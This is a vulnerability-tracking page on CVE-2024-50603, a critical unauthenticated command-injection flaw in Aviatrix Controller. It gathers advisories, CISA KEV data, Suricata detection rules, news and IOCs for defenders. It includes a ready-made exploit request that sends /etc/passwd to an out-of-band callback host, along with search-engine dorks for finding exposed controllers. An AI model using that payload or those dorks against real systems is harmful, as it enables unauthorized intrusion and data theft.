CVE-2024-50603
published 2025-01-08CVE-2024-50603: An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS…
PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-02-06
Exploited in the wild
EPSS
98.55%
99.9th percentile
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aviatrix | controller | < 7.1.4191 | 7.1.4191 |
| aviatrix | controller | >= 7.2 < 7.2.4996 | 7.2.4996 |
| aviatrix | controller | >= 7.2.0 < 7.2.4996 | 7.2.4996 |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})↗
- →Exploit targets POST /v1/api with action=list_flightpath_destination_instances or flightpath_connection_test; inject shell metacharacters in cloud_type or src_cloud_type parameters to achieve unauthenticated RCE ↗
- →Hunt for Aviatrix Controller instances via Shodan/FOFA/ZoomEye using title-based fingerprints: http.title:"aviatrix controller", http.title:"aviatrix cloud controller", app="aviatrix-controller", title="aviatrix cloud controller" ↗
- →Detect exploitation via OAST/interactsh callback: look for HTTP POST to /v1/api returning HTTP 200 combined with out-of-band DNS/HTTP interaction containing root:.*:0:0: in the request body (exfiltrated /etc/passwd) ↗
- →All observed malware was first deployed between 2025-01-07 and 2025-01-10; exploitation surged following publication of a Nuclei template — use this timeline to scope forensic investigation on Aviatrix Controller instances ↗
- ·The IP address 172.104.60[.]176 is associated with at least one Sliver-deploying actor but is likely a shared proxy server and therefore not strictly reliable as a standalone IOC ↗
- ·The patch must be re-applied if the Controller is later upgraded to a version prior to 7.1.4191 or 7.2.4996, or if the Controller does not have an associated CoPilot running version 4.16.1 or higher ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2vqc-674h-xh9w: An issue was discovered in Aviatrix Controller before 7
ghsa_unreviewed·2025-01-08
CVE-2024-50603 [CRITICAL] CWE-78 GHSA-2vqc-674h-xh9w: An issue was discovered in Aviatrix Controller before 7
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
VulnCheck
Aviatrix Controllers OS Command Injection Vulnerability
vulncheck·2024·CVSS 10.0
CVE-2024-50603 [CRITICAL] CWE-78 Aviatrix Controllers OS Command Injection Vulnerability
Aviatrix Controllers OS Command Injection Vulnerability
Aviatrix Controllers contain an OS command injection vulnerability that could allow an unauthenticated attacker to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Affected: Aviatrix Controllers
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers; https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-
CISA
Aviatrix Controllers OS Command Injection Vulnerability
cisa·2025-01-16·CVSS 9.8
CVE-2024-50603 [CRITICAL] CWE-78 Aviatrix Controllers OS Command Injection Vulnerability
Vulnerability: Aviatrix Controllers OS Command Injection Vulnerability
Affected: Aviatrix Controllers
Aviatrix Controllers contain an OS command injection vulnerability that could allow an unauthenticated attacker to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true ; https://nvd.nist.gov/vuln/detail/CVE-2024-50603
Remediation Due Date: 2025-02-06
Suricata
ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M2
suricata·2025-01-13·CVSS 10.0
CVE-2024-50603 [CRITICAL] ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M2
ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/v1/api"; http.request_body; content:"action|3d|flightpath_connection_test"; fast_pattern; content:"src_cloud_type|3d|"; pcre:"/^[\S]*?[\x3b\x0a\x26\x60\x7c\x24]/R"; reference:url,securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/; reference:cve,2024-50603; classtype:web-application-attack; sid:2059174; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_01_13, cve CVE_2024_50603, deployment Perimete
Suricata
ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M1
suricata·2025-01-13·CVSS 10.0
CVE-2024-50603 [CRITICAL] ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M1
ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M1
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M1"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/v1/api"; http.request_body; content:"action|3d|list_flightpath_destination_instances"; fast_pattern; content:"cloud_type|3d|"; pcre:"/^[\S]*?[\x3b\x0a\x26\x60\x7c\x24]/R"; reference:url,securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/; reference:cve,2024-50603; classtype:web-application-attack; sid:2059173; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_01_13, cve CVE_2024_50603, deployment P
Nuclei
Aviatrix Controller - Remote Code Execution
nuclei·CVSS 9.8
CVE-2024-50603 [CRITICAL] Aviatrix Controller - Remote Code Execution
Aviatrix Controller - Remote Code Execution
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Template:
id: CVE-2024-50603
info:
name: Aviatrix Controller - Remote Code Execution
author: newlinesec,securing.pl
severity: critical
description: |
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbit
Wiz
Crying Out Cloud Newsletter - February 2025 | Wiz
blogs_wiz·2025-02-06
Crying Out Cloud Newsletter - February 2025 | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's dive in.
Here are our top picks of cloud security highlights!
Hype or no hype – Codefinger Ransomware Campaign Targeting S3 Buckets
Codefinger is a ransomware campaign that exploits AWS Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data in Amazon S3 buckets. While this campaign has sparked widespread concern, we argue that the panic is unwarranted. Many have focused on detecting unwanted SSE-C encryption as a mitigation strategy, but encryption is merely a tactic chosen by the attacker after gaining access—it is not the core issue. The real concern, which is neither new nor unique, is the use of compromised credential
Bleepingcomputer
Hackers exploit critical Aviatrix Controller RCE flaw in attacks
blogs_bleepingcomputer·2025-01-13·CVSS 10.0
CVE-2024-50603 [CRITICAL] Hackers exploit critical Aviatrix Controller RCE flaw in attacks
## Hackers exploit critical Aviatrix Controller RCE flaw in attacks
## Bill Toulas
This allows threat actors to use specially crafted API requests to achieve remote command execution without authentication.
The flaw impacts all versions of Aviatrix Controller from 7.x through 7.2.4820. Users are recommended to upgrade to either 7.1.4191 or 7.2.4996, which addresses the CVE-2024-50603 risk.
## Active exploitation in the wild
Wiz Research reports that a proof-of-concept (PoC) exploit released on GitHub on January 8, 2025, has fueled the exploitation of CVE-2024-50603 in the wild.
Hackers are leveraging the flaw to plant Sliver backdoors and perform unauthorized Monero cryptocurrency mining using XMRig (cryptojacking).
Wiz says that although only a small percentage of cloud enterprise
Wiz
Wiz Research Identifies Exploitation in the Wild of Aviatrix Controller RCE (CVE-2024-50603) | Wiz Blog
blogs_wiz·2025-01-11·CVSS 10.0
CVE-2024-50603 [CRITICAL] Wiz Research Identifies Exploitation in the Wild of Aviatrix Controller RCE (CVE-2024-50603) | Wiz Blog
Updated on 2025-01-19 to include additional investigation findings related to Sliver and Mirai infections.
CVE-2024-50603 is a critical code execution vulnerability impacting Aviatrix Controller with the maximum CVSS score of 10.0. This command injection flaw allows unauthenticated attackers to execute arbitrary commands on the system remotely. The vulnerability stems from the improper neutralization of user-supplied input, and has been addressed in patched versions `7.1.4191` and `7.2.4996`.
When deployed in AWS cloud environments, Aviatrix Controller allows privilege escalation by default, making exploitation of this vulnerability a high-impact risk. A simple proof-of-concept exploit has been published, and Wiz Research has already observed exploitation in the wild resulting in cryptoj
Wiz
Wiz Research Identifies Exploitation in the Wild of Aviatrix Controller RCE (CVE-2024-50603) | Wiz Blog
blogs_wiz·2025-01-11·CVSS 10.0
[CRITICAL] Wiz Research Identifies Exploitation in the Wild of Aviatrix Controller RCE (CVE-2024-50603) | Wiz Blog
Updated on 2025-01-19 to include additional investigation findings related to Sliver and Mirai infections.
7.1.4191
7.2.4996
When deployed in AWS cloud environments, Aviatrix Controller allows privilege escalation by default, making exploitation of this vulnerability a high-impact risk. A simple proof-of-concept exploit has been published , and Wiz Research has already observed exploitation in the wild resulting in cryptojacking and backdoor deployment. For these reasons, it is highly recommended to upgrade Aviatrix Controller to the patched versions, conduct forensic investigation on the devices, and search for lateral movement attempts to the cloud control plane.
## What is CVE-2024-50603?
list_flightpath_destination_instances
flightpath_connection_test
cloud_type
src_cloud_type
Greynoiseio
NoiseLetter January 2025
blogs_greynoiseio
NoiseLetter January 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://docs.aviatrix.com/documentation/latest/network-security/index.htmlhttps://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllershttps://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-50603
2025-01-08
Published
2025-01-16
Added to CISA KEV
Exploited in the wild